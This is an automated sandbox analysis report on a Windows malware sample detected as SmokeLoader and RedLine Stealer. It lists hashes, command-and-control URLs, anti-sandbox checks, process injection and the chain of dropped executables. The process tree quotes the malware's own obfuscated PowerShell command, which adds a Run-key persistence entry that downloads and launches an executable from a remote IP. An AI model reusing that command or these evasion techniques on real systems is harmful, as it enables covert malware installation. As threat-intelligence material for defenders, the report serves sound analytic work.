Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
13-08-2021 08:10
Static task
static1
Behavioral task
behavioral1
Sample
e092c290ecbe05b96a01a8557d202191.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
e092c290ecbe05b96a01a8557d202191.exe
Resource
win10v20210408
General
-
Target
e092c290ecbe05b96a01a8557d202191.exe
-
Size
180KB
-
MD5
e092c290ecbe05b96a01a8557d202191
-
SHA1
81ce24f7af893885025cb184de98da3bee563169
-
SHA256
7984865f4df4f3569df5096b7a2b6bf03f070a9ef5fb6e46d3365e40e2f92a01
-
SHA512
8dc9553013af612b8b5099bdeff2eaf021a2369298428460e4a349220c8db912e3a34f45eba9fbd89e9ea96f5d672d0eb9a9373b497130206bc5e3b4de963799
Malware Config
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes:
22FB.exe26D3.exe2934.exeRuntimebroker.exe2ABB.exe30E4.exepid process 1404 22FB.exe 1252 26D3.exe 1660 2934.exe 1460 Runtimebroker.exe 540 2ABB.exe 1572 30E4.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
30E4.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 30E4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 30E4.exe -
Deletes itself 1 IoCs
Processes:
pid process 1356 -
Drops startup file 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe -
Loads dropped DLL 2 IoCs
Processes:
26D3.exepid process 1252 26D3.exe 1252 26D3.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\30E4.exe themida behavioral1/memory/1572-93-0x0000000000160000-0x0000000000161000-memory.dmp themida -
Processes:
30E4.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 30E4.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
30E4.exepid process 1572 30E4.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
e092c290ecbe05b96a01a8557d202191.exedescription pid process target process PID 452 set thread context of 1936 452 e092c290ecbe05b96a01a8557d202191.exe e092c290ecbe05b96a01a8557d202191.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
e092c290ecbe05b96a01a8557d202191.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e092c290ecbe05b96a01a8557d202191.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e092c290ecbe05b96a01a8557d202191.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e092c290ecbe05b96a01a8557d202191.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e092c290ecbe05b96a01a8557d202191.exepid process 1936 e092c290ecbe05b96a01a8557d202191.exe 1936 e092c290ecbe05b96a01a8557d202191.exe 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 1356 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 1356 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
e092c290ecbe05b96a01a8557d202191.exepid process 1936 e092c290ecbe05b96a01a8557d202191.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
30E4.exedescription pid process Token: SeShutdownPrivilege 1356 Token: SeShutdownPrivilege 1356 Token: SeDebugPrivilege 1572 30E4.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process 1356 1356 1356 1356 -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
pid process 1356 1356 1356 1356 1356 1356 -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
22FB.exepid process 1404 22FB.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
e092c290ecbe05b96a01a8557d202191.exe26D3.exeRuntimebroker.exe2934.exedescription pid process target process PID 452 wrote to memory of 1936 452 e092c290ecbe05b96a01a8557d202191.exe e092c290ecbe05b96a01a8557d202191.exe PID 452 wrote to memory of 1936 452 e092c290ecbe05b96a01a8557d202191.exe e092c290ecbe05b96a01a8557d202191.exe PID 452 wrote to memory of 1936 452 e092c290ecbe05b96a01a8557d202191.exe e092c290ecbe05b96a01a8557d202191.exe PID 452 wrote to memory of 1936 452 e092c290ecbe05b96a01a8557d202191.exe e092c290ecbe05b96a01a8557d202191.exe PID 452 wrote to memory of 1936 452 e092c290ecbe05b96a01a8557d202191.exe e092c290ecbe05b96a01a8557d202191.exe PID 452 wrote to memory of 1936 452 e092c290ecbe05b96a01a8557d202191.exe e092c290ecbe05b96a01a8557d202191.exe PID 452 wrote to memory of 1936 452 e092c290ecbe05b96a01a8557d202191.exe e092c290ecbe05b96a01a8557d202191.exe PID 1356 wrote to memory of 1404 1356 22FB.exe PID 1356 wrote to memory of 1404 1356 22FB.exe PID 1356 wrote to memory of 1404 1356 22FB.exe PID 1356 wrote to memory of 1404 1356 22FB.exe PID 1356 wrote to memory of 1252 1356 26D3.exe PID 1356 wrote to memory of 1252 1356 26D3.exe PID 1356 wrote to memory of 1252 1356 26D3.exe PID 1356 wrote to memory of 1252 1356 26D3.exe PID 1356 wrote to memory of 1660 1356 2934.exe PID 1356 wrote to memory of 1660 1356 2934.exe PID 1356 wrote to memory of 1660 1356 2934.exe PID 1356 wrote to memory of 1660 1356 2934.exe PID 1252 wrote to memory of 1460 1252 26D3.exe Runtimebroker.exe PID 1252 wrote to memory of 1460 1252 26D3.exe Runtimebroker.exe PID 1252 wrote to memory of 1460 1252 26D3.exe Runtimebroker.exe PID 1252 wrote to memory of 1460 1252 26D3.exe Runtimebroker.exe PID 1356 wrote to memory of 540 1356 2ABB.exe PID 1356 wrote to memory of 540 1356 2ABB.exe PID 1356 wrote to memory of 540 1356 2ABB.exe PID 1356 wrote to memory of 540 1356 2ABB.exe PID 1356 wrote to memory of 1572 1356 30E4.exe PID 1356 wrote to memory of 1572 1356 30E4.exe PID 1356 wrote to memory of 1572 1356 30E4.exe PID 1356 wrote to memory of 1572 1356 30E4.exe PID 1356 wrote to memory of 1572 1356 30E4.exe PID 1356 wrote to memory of 1572 1356 30E4.exe PID 1356 wrote to memory of 1572 1356 30E4.exe PID 1460 wrote to memory of 1588 1460 Runtimebroker.exe powershell.exe PID 1460 wrote to memory of 1588 1460 Runtimebroker.exe powershell.exe PID 1460 wrote to memory of 1588 1460 Runtimebroker.exe powershell.exe PID 1460 wrote to memory of 1588 1460 Runtimebroker.exe powershell.exe PID 1660 wrote to memory of 848 1660 2934.exe cmd.exe PID 1660 wrote to memory of 848 1660 2934.exe cmd.exe PID 1660 wrote to memory of 848 1660 2934.exe cmd.exe PID 1660 wrote to memory of 848 1660 2934.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e092c290ecbe05b96a01a8557d202191.exe"C:\Users\Admin\AppData\Local\Temp\e092c290ecbe05b96a01a8557d202191.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Users\Admin\AppData\Local\Temp\e092c290ecbe05b96a01a8557d202191.exe"C:\Users\Admin\AppData\Local\Temp\e092c290ecbe05b96a01a8557d202191.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1936
-
C:\Users\Admin\AppData\Local\Temp\22FB.exeC:\Users\Admin\AppData\Local\Temp\22FB.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1404
-
C:\Users\Admin\AppData\Local\Temp\26D3.exeC:\Users\Admin\AppData\Local\Temp\26D3.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵PID:1588
-
C:\Users\Admin\AppData\Local\Temp\2934.exeC:\Users\Admin\AppData\Local\Temp\2934.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\cmd.execmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat2⤵
- Drops startup file
PID:848
-
C:\Users\Admin\AppData\Local\Temp\2ABB.exeC:\Users\Admin\AppData\Local\Temp\2ABB.exe1⤵
- Executes dropped EXE
PID:540
-
C:\Users\Admin\AppData\Local\Temp\30E4.exeC:\Users\Admin\AppData\Local\Temp\30E4.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1572
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
MD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
MD5
a69e12607d01237460808fa1709e5e86
SHA14a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA5127533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
MD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
MD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
MD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
MD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
MD5
717d65dba56f47e540dca074c3977b3d
SHA1d58aa30f826f41663e693f0ad930fdce584f1672
SHA25661fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
SHA512b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d
-
MD5
c5a856f88c4a9751a02aa9720f69a67d
SHA1b5ddcc11560ee2fbb9b30ebb040a5c1b03184a97
SHA2568783f9f08cd4825b7aa0f01ee96ab5d827fcd4ec727667962a3e84c894c29734
SHA51271aa4addfe6134721c322b39b9e5e8876e2f88ac44931fbef78ba89d763e9aa2fbf4809529dcd7151f6c1dd645463a2a24427f26138fa2bc0eb792d8ea67450b
-
MD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
MD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9